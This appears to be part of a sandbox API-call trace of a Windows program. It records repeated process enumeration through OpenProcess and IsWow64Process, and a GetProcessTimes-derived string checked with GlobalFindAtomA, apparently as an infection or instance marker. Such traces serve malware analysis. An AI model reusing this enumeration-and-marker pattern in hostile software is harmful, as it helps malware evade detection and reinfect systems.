	[0119.870] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.871] CloseHandle (hObject=0x698) returned 1
	[0119.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0119.871] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.871] CloseHandle (hObject=0x698) returned 1
	[0119.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0119.871] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.871] CloseHandle (hObject=0x698) returned 1
	[0119.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0119.871] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.871] CloseHandle (hObject=0x698) returned 1
	[0119.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0119.871] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.871] CloseHandle (hObject=0x698) returned 1
	[0119.872] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0119.872] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.872] CloseHandle (hObject=0x698) returned 1
	[0119.872] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0119.872] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0119.872] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.872] CloseHandle (hObject=0x698) returned 1
	[0119.872] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0119.872] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.872] CloseHandle (hObject=0x698) returned 1
	[0119.872] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0119.872] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.872] CloseHandle (hObject=0x698) returned 1
	[0119.873] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0119.873] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.873] CloseHandle (hObject=0x698) returned 1
	[0119.873] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0119.873] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.873] CloseHandle (hObject=0x698) returned 1
	[0119.873] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0119.873] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.873] CloseHandle (hObject=0x698) returned 1
	[0119.873] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0119.873] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.873] CloseHandle (hObject=0x698) returned 1
	[0119.873] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0119.873] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.873] CloseHandle (hObject=0x698) returned 1
	[0119.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0119.876] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.876] CloseHandle (hObject=0x698) returned 1
	[0119.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0119.876] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.876] CloseHandle (hObject=0x698) returned 1
	[0119.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0119.876] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.876] CloseHandle (hObject=0x698) returned 1
	[0119.877] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0119.877] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.877] CloseHandle (hObject=0x698) returned 1
	[0119.877] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0119.877] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.877] CloseHandle (hObject=0x698) returned 1
	[0119.877] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0119.877] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.877] CloseHandle (hObject=0x698) returned 1
	[0119.877] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0119.877] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.877] CloseHandle (hObject=0x698) returned 1
	[0119.877] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0119.877] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.877] CloseHandle (hObject=0x698) returned 1
	[0119.878] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0119.878] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.878] CloseHandle (hObject=0x698) returned 1
	[0119.878] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0119.878] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.878] CloseHandle (hObject=0x698) returned 1
	[0119.878] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0119.878] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.878] CloseHandle (hObject=0x698) returned 1
	[0119.878] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0119.878] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.878] CloseHandle (hObject=0x698) returned 1
	[0119.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0119.879] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.879] CloseHandle (hObject=0x698) returned 1
	[0119.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0119.879] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.879] CloseHandle (hObject=0x698) returned 1
	[0119.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0119.879] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.879] CloseHandle (hObject=0x698) returned 1
	[0119.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0119.880] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0119.880] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0119.880] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0119.880] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0119.880] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0119.880] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0119.881] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0119.881] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0119.881] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0119.881] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0119.881] CloseHandle (hObject=0x698) returned 1
	[0119.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0119.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0119.881] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.881] CloseHandle (hObject=0x698) returned 1
	[0119.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0119.882] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.882] CloseHandle (hObject=0x698) returned 1
	[0119.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0119.882] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.882] CloseHandle (hObject=0x698) returned 1
	[0119.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0119.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0119.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0119.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0119.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0119.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0119.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0119.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0119.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0119.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0119.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0119.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0119.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0119.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0119.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0119.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0119.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0119.919] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0119.919] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0119.919] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.919] CloseHandle (hObject=0x698) returned 1
	[0119.919] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0119.919] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0119.920] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0119.920] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.920] CloseHandle (hObject=0x698) returned 1
	[0119.920] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0119.920] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0119.920] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.920] CloseHandle (hObject=0x698) returned 1
	[0119.920] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0119.920] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.920] CloseHandle (hObject=0x698) returned 1
	[0119.920] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0119.920] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.920] CloseHandle (hObject=0x698) returned 1
	[0119.921] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0119.921] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.921] CloseHandle (hObject=0x698) returned 1
	[0119.921] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0119.921] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.921] CloseHandle (hObject=0x698) returned 1
	[0119.921] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0119.921] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.921] CloseHandle (hObject=0x698) returned 1
	[0119.921] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0119.924] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0119.924] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.924] CloseHandle (hObject=0x698) returned 1
	[0119.924] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0119.924] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.924] CloseHandle (hObject=0x698) returned 1
	[0119.924] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0119.924] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.924] CloseHandle (hObject=0x698) returned 1
	[0119.924] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0119.924] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.924] CloseHandle (hObject=0x698) returned 1
	[0119.924] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0119.925] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.925] CloseHandle (hObject=0x698) returned 1
	[0119.925] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0119.925] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.925] CloseHandle (hObject=0x698) returned 1
	[0119.925] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0119.925] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.925] CloseHandle (hObject=0x698) returned 1
	[0119.925] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0119.925] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.925] CloseHandle (hObject=0x698) returned 1
	[0119.925] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0119.925] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.925] CloseHandle (hObject=0x698) returned 1
	[0119.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0119.926] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.926] CloseHandle (hObject=0x698) returned 1
	[0119.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0119.926] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.926] CloseHandle (hObject=0x698) returned 1
	[0119.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0119.926] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.926] CloseHandle (hObject=0x698) returned 1
	[0119.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0119.926] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.926] CloseHandle (hObject=0x698) returned 1
	[0119.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0119.926] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.926] CloseHandle (hObject=0x698) returned 1
	[0119.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0119.927] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.927] CloseHandle (hObject=0x698) returned 1
	[0119.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0119.927] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.927] CloseHandle (hObject=0x698) returned 1
	[0119.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0119.927] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.927] CloseHandle (hObject=0x698) returned 1
	[0119.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0119.928] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.928] CloseHandle (hObject=0x698) returned 1
	[0119.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0119.928] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.928] CloseHandle (hObject=0x698) returned 1
	[0119.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0119.928] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.928] CloseHandle (hObject=0x698) returned 1
	[0119.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0119.928] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.928] CloseHandle (hObject=0x698) returned 1
	[0119.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0119.929] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.929] CloseHandle (hObject=0x698) returned 1
	[0119.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0119.929] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.929] CloseHandle (hObject=0x698) returned 1
	[0119.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0119.929] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0119.929] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0119.930] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0119.930] wsprintfA (in: param_1=0x3993268, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0119.930] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0119.930] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0119.930] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0119.931] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0119.931] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0119.931] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0119.931] CloseHandle (hObject=0x698) returned 1
	[0119.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0119.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0119.931] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.931] CloseHandle (hObject=0x698) returned 1
	[0119.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0119.931] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.931] CloseHandle (hObject=0x698) returned 1
	[0119.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0119.931] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.932] CloseHandle (hObject=0x698) returned 1
	[0119.965] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.965] CloseHandle (hObject=0x698) returned 1
	[0119.965] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.965] CloseHandle (hObject=0x698) returned 1
	[0119.965] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.965] CloseHandle (hObject=0x698) returned 1
	[0119.965] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.965] CloseHandle (hObject=0x698) returned 1
	[0119.965] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.965] CloseHandle (hObject=0x698) returned 1
	[0119.966] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.966] CloseHandle (hObject=0x698) returned 1
	[0119.966] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.966] CloseHandle (hObject=0x698) returned 1
	[0119.966] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.966] CloseHandle (hObject=0x698) returned 1
	[0119.966] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.966] CloseHandle (hObject=0x698) returned 1
	[0119.966] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.966] CloseHandle (hObject=0x698) returned 1
	[0119.967] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.967] CloseHandle (hObject=0x698) returned 1
	[0119.967] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.967] CloseHandle (hObject=0x698) returned 1
	[0119.967] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.967] CloseHandle (hObject=0x698) returned 1
	[0119.968] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.968] CloseHandle (hObject=0x698) returned 1
	[0119.968] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.968] CloseHandle (hObject=0x698) returned 1
	[0119.968] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.968] CloseHandle (hObject=0x698) returned 1
	[0119.968] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.968] CloseHandle (hObject=0x698) returned 1
	[0119.968] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.968] CloseHandle (hObject=0x698) returned 1
	[0119.969] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.969] CloseHandle (hObject=0x698) returned 1
	[0119.969] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.969] CloseHandle (hObject=0x698) returned 1
	[0119.969] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.969] CloseHandle (hObject=0x698) returned 1
	[0119.969] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.969] CloseHandle (hObject=0x698) returned 1
	[0119.969] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.969] CloseHandle (hObject=0x698) returned 1
	[0119.970] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.972] CloseHandle (hObject=0x698) returned 1
	[0119.972] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.972] CloseHandle (hObject=0x698) returned 1
	[0119.972] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.972] CloseHandle (hObject=0x698) returned 1
	[0119.972] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.972] CloseHandle (hObject=0x698) returned 1
	[0119.973] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.973] CloseHandle (hObject=0x698) returned 1
	[0119.973] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.973] CloseHandle (hObject=0x698) returned 1
